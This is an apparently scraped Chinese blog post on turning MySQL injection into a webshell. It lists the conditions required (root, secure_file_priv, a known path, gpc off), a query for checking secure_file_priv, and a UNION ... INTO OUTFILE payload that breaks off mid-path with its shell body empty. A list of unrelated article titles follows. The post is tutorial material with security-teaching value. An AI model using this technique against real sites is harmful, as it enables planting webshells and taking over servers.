mysql注入getshell
2024-09-06 14:49:22
0x00 利用条件
- root权限
- secure_file_priv=为空或者在网站根目录下(网站根目录为d:\www,secure_file_priv=d:\也可以)
- 知道绝对路径
- gpc关闭,这个应该是php的,会转义单引号,选择路径的时候一定需要单引号
0x01 查看secure_file_priv设置
show global variables like '%secure_file_priv%';
查询结果
- 5.7.26为null,5.5.29为空
这里为NULL
0x02 联合注入写shell
select * from users where id=-1 union select 1,2,'' into outfile 'D
最新文章
- Python中的dict和set
- React之Froms
- tableView优化性能
- Mathematics:Raising Modulo Numbers(POJ 1995)
- NYOJ之猴子吃桃问题
- Redis与Java - 实践
- JS教程:词法作用域和闭包 (网络资源)
- android WebView交互优化
- 转:Why SeaJS
- 查询显示MSSQL表结构 [转]
- git创建与合并分支
- Excel 自定义函数
- .Netcore之日志组件Log4net、Nlog性能比较
- 怎样将word文件转化为Latex文件:word-to-latex-2.56具体解释
- springMVC(7)---表单标签
- Pymongo一些常见需求(陆续补充)
- meta的用法
- MySQL集群架构:MHA+MySQL-PROXY+LVS实现MySQL集群架构高可用/高性能-技术流ken
- switch_case注意事项
- 【转】10 个很有用的 jQuery 弹出层提示插件